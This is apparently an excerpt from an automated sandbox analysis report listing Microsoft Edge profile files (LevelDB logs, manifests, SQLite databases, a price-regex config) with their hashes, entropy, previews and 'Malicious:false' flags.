                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\000003.log

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):33
                                                                                                                                                                                                                                                                                Entropy (8bit):3.5394429593752084
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:iWstvhYNrkUn:iptAd
                                                                                                                                                                                                                                                                                MD5:F27314DD366903BBC6141EAE524B0FDE
                                                                                                                                                                                                                                                                                SHA1:4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
                                                                                                                                                                                                                                                                                SHA-256:68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
                                                                                                                                                                                                                                                                                SHA-512:07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:...m.................DB_VERSION.1

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\CURRENT (copy)

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):305
                                                                                                                                                                                                                                                                                Entropy (8bit):5.171739746398049
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:6:iOvWZ81wkn23oH+TcwtnG2tbB2KLlNWMvWM+q2Pwkn23oH+TcwtnG2tMsIFUv:7ObfYebn9VFL9vL+vYfYebn9GFUv
                                                                                                                                                                                                                                                                                MD5:3772F30DDC7643CFE39CBD9A2AA263B1
                                                                                                                                                                                                                                                                                SHA1:7BC9FE01DAC0ACE69C529D8EC1385932D98FC0E4
                                                                                                                                                                                                                                                                                SHA-256:03A049177122F7B2A6FA53A863087D27973421B363719552FA760BDC951148CA
                                                                                                                                                                                                                                                                                SHA-512:CC61F98D27912E6E22C46CBBC81561B5546E13D759E1C447AF12153C6B1DE1923F9E844D9A0412CD9A0A6273F92CBF5F3C90FD2D2298529DE33368F7FE6052E8
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:2025/03/08-18:52:28.863 22ac Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db since it was missing..2025/03/08-18:52:29.088 22ac Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\MANIFEST-000001

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):41
                                                                                                                                                                                                                                                                                Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeEDrop\EdgeEDropSQLite.db

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 14, database pages 8, cookie 0xe, schema 4, UTF-8, version-valid-for 14
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):32768
                                                                                                                                                                                                                                                                                Entropy (8bit):0.494709561094235
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:24:TLEC30OIcqIn2o0FUFlA2cs0US5S693Xlej2:ThLaJUnAg0UB6I
                                                                                                                                                                                                                                                                                MD5:CF7760533536E2AF66EA68BC3561B74D
                                                                                                                                                                                                                                                                                SHA1:E991DE2EA8F42AE7E0A96A3B3B8AF87A689C8CCD
                                                                                                                                                                                                                                                                                SHA-256:E1F183FAE5652BA52F5363A7E28BF62B53E7781314C9AB76B5708AF9918BE066
                                                                                                                                                                                                                                                                                SHA-512:38B15FE7503F6DFF9D39BC74AA0150A7FF038029F973BE9A37456CDE6807BCBDEAB06E624331C8DFDABE95A5973B0EE26A391DB2587E614A37ADD50046470162
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j...i............t...c................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeHubAppUsage\EdgeHubAppUsageSQLite.db

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                                                                                                                                Entropy (8bit):0.6135516879551275
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:24:TLqpR+DDNzWjJ0npnyXKUO8+jPYpIKBmL:Te8D4jJ/6Up+nV
                                                                                                                                                                                                                                                                                MD5:B73ABF4ADFFF5F0D261D6AF408103778
                                                                                                                                                                                                                                                                                SHA1:A15DB4E618F2F34EB13E759616B178E36323DFC0
                                                                                                                                                                                                                                                                                SHA-256:6DEFF02170BB4EC1213361C7BDF5CE0C3436C37F45C8218562EA02F932335A1A
                                                                                                                                                                                                                                                                                SHA-512:D32A3E5EBA9BDF7DE027AD03A44FDE8FC2DCB68649892520DB9F4D92D3A00B616FD6E238B67A5A8FF889F89A7DDD087DBDD229166EABC6BB76E609A65F54CC81
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j...%.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000001.dbtmp

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000003.log

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):375520
                                                                                                                                                                                                                                                                                Entropy (8bit):5.354133588519352
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:6144:9A/imBpx6WdPSxKWcHu5MURacq49QxxPnyEndBuHltBfdK5WNbsVEziP/CfXtLPz:9FdMyq49tEndBuHltBfdK5WNbsVEziPU
                                                                                                                                                                                                                                                                                MD5:9DA6AF14662AC3AED3824E12132B2B62
                                                                                                                                                                                                                                                                                SHA1:37C8FC62B5944BD48E953EB19BDB90ED95F0EFF2
                                                                                                                                                                                                                                                                                SHA-256:4F68D0B458090C9FF982121AEB5EFBC5AD3791BB8D1225EE875225E520C0CF83
                                                                                                                                                                                                                                                                                SHA-512:0A3D48A16259BA1D2612BBEEFACBC7CA4AF574679233A1260F3800B4BF830896FEABCC899E16A564474204B7FD747106E68096FE0606F347A7DC95A44BE16D7E
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:...m.................DB_VERSION.1..p.q...............&QUERY_TIMESTAMP:domains_config_gz2.*.*.13385951559435304..QUERY:domains_config_gz2.*.*..[{"name":"domains_config_gz","url":"https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig","version":{"major":2,"minor":8,"patch":76},"hash":"78Xsq/1H+MXv88uuTT1Rx79Nu2ryKVXh2J6ZzLZd38w=","size":374872}]..*.`~...............ASSET_VERSION:domains_config_gz.2.8.76..ASSET:domains_config_gz...{"config": {"token_limit": 1600, "page_cutoff": 4320, "default_locale_map": {"bg": "bg-bg", "bs": "bs-ba", "el": "el-gr", "en": "en-us", "es": "es-mx", "et": "et-ee", "cs": "cs-cz", "da": "da-dk", "de": "de-de", "fa": "fa-ir", "fi": "fi-fi", "fr": "fr-fr", "he": "he-il", "hr": "hr-hr", "hu": "hu-hu", "id": "id-id", "is": "is-is", "it": "it-it", "ja": "ja-jp", "ko": "ko-kr", "lv": "lv-lv", "lt": "lt-lt", "mk": "mk-mk", "nl": "nl-nl", "nb": "nb-no", "no": "no-no", "pl": "pl-pl", "pt": "pt-pt", "ro": "

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\CURRENT (copy)

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\LOG

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):309
                                                                                                                                                                                                                                                                                Entropy (8bit):5.183861155457618
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:6:iOvWzbn1wkn23oH+Tcwtk2WwnvB2KLlNW3RiUGqM+q2Pwkn23oH+Tcwtk2WwnvIg:7NfYebkxwnvFLr3+vYfYebkxwnQFUv
                                                                                                                                                                                                                                                                                MD5:BEF90C4F667D00661ED5721B9EFBB851
                                                                                                                                                                                                                                                                                SHA1:00479D7FE6F4D422C2EFDA9D904E48D338459D82
                                                                                                                                                                                                                                                                                SHA-256:D0521167EBDDC2FD530FA3A86AB8EF89D93C4EDD19119601DD24A7367D5E7036
                                                                                                                                                                                                                                                                                SHA-512:EF91ACDAC58B5C592120545E99A552FDB573A9068F727A8D948F46E116A16A5DA5437570FB7D4FACA1D47D62CD491D5FB592491C5B09256FA4ECAA465B16D1AE
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:2025/03/08-18:52:35.295 201c Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2025/03/08-18:52:35.641 201c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\MANIFEST-000001

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):41
                                                                                                                                                                                                                                                                                Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\domains_config.json

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                                                                Size (bytes):358859
                                                                                                                                                                                                                                                                                Entropy (8bit):5.3246069917816135
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:6144:CgimBVvUrsc6rRA81b/18jyJNjfvrfM6Rv:C1gAg1zfvH
                                                                                                                                                                                                                                                                                MD5:478335B1DB9E40C4A9D389B14247FFCB
                                                                                                                                                                                                                                                                                SHA1:FF5696A9D98C568CCE553BCDD6B84EE195449A04
                                                                                                                                                                                                                                                                                SHA-256:B5E9FBD95337FB2A93855222A26EA5F1C613D8567610CDD3383A92A8F55C0B47
                                                                                                                                                                                                                                                                                SHA-512:D2CEE7CD8F6DCF455E5F4F47DAC22BE495C1E535A8CABC7B538EA998392E96E70B2054BF5819B478D714CE1F3751D6B77DAC13A98A53F353802C665291D682B2
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:{"aee_config":{"ar":{"price_regex":{"ae":"(((ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)))","dz":"(((dzd|da|\\x{062F}\\x{062C})\\s*\\d{1,3})|(\\d{1,3}\\s*(dzd|da|\\x{062F}\\x{062C})))","eg":"(((e\\x{00a3}|egp)\\s*\\d{1,3})|(\\d{1,3}\\s*(e\\x{00a3}|egp)))","ma":"(((mad|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(mad|dhs|dh)))","sa":"((\\d{1,3}\\s*(sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633}))|((sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633})\\s*\\d{1,3}))"},"product_terms":"((\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{0639}\\x{0631}\\x{0628}\\x{0629})|(\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{062D}\\x{0642}\\x{064A}\\x{0628}\\x{0629})|(\\x{0627}\\x{0634}\\x{062A}\\x{0631}\\x{064A}\\s*\\x{0627}\\x{0644}\\x{0622}\\x{0646})|(\\x{062E}\\x{064A}\\x{0627}\\x{0631}

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\000001.dbtmp

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\000003.log

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):209
                                                                                                                                                                                                                                                                                Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:FQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlX:qTCTCTCTCTCTCTCTCTCTCT
                                                                                                                                                                                                                                                                                MD5:478D49D9CCB25AC14589F834EA70FB9E
                                                                                                                                                                                                                                                                                SHA1:5D30E87D66E279F8815AFFE4C691AAF1D577A21E
                                                                                                                                                                                                                                                                                SHA-256:BB6CC6DF54CF476D95409032C79E065F4E10D512E73F7E16018E550456F753D5
                                                                                                                                                                                                                                                                                SHA-512:FB5431054A23D3C532568B1F150873D9130DBC4A88BE19BC2A4907D0DC2888C5B55993154EAD4A6C466E2173092B8705684A6802B850F051639E1F2457387471
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\CURRENT (copy)

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):281
                                                                                                                                                                                                                                                                                Entropy (8bit):5.1653045782904625
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:6:iOvWZ5XAB1wkn23oH+Tcwt8aVdg2KLlNWMb+q2Pwkn23oH+Tcwt8aPrqIFUv:7O5QkfYeb0L9CvYfYebL3FUv
                                                                                                                                                                                                                                                                                MD5:FCE7636B77B4B429F7BDCEE17593F754
                                                                                                                                                                                                                                                                                SHA1:6D3A91269AC3D1BA98696BB4ACF853E28C91CAFA
                                                                                                                                                                                                                                                                                SHA-256:514845546BD78C4AC994CDFCCACFBDBBEC880AF70D7F625794A10E355382B30C
                                                                                                                                                                                                                                                                                SHA-512:10EDB5416AF693A3B1AF141095DECC4F227855E6B876D8A582393FA5DE266AD9283967C2660CAEA49C451E38F1BD81D042FD564A24422386BD49F04904479032
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:2025/03/08-18:52:28.993 2268 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules since it was missing..2025/03/08-18:52:29.060 2268 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\MANIFEST-000001

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):41
                                                                                                                                                                                                                                                                                Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\000001.dbtmp

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\000003.log

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):209
                                                                                                                                                                                                                                                                                Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:FQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlX:qTCTCTCTCTCTCTCTCTCTCT
                                                                                                                                                                                                                                                                                MD5:478D49D9CCB25AC14589F834EA70FB9E
                                                                                                                                                                                                                                                                                SHA1:5D30E87D66E279F8815AFFE4C691AAF1D577A21E
                                                                                                                                                                                                                                                                                SHA-256:BB6CC6DF54CF476D95409032C79E065F4E10D512E73F7E16018E550456F753D5
                                                                                                                                                                                                                                                                                SHA-512:FB5431054A23D3C532568B1F150873D9130DBC4A88BE19BC2A4907D0DC2888C5B55993154EAD4A6C466E2173092B8705684A6802B850F051639E1F2457387471
                                                                                                                                                                                                                                                                                Malicious:false
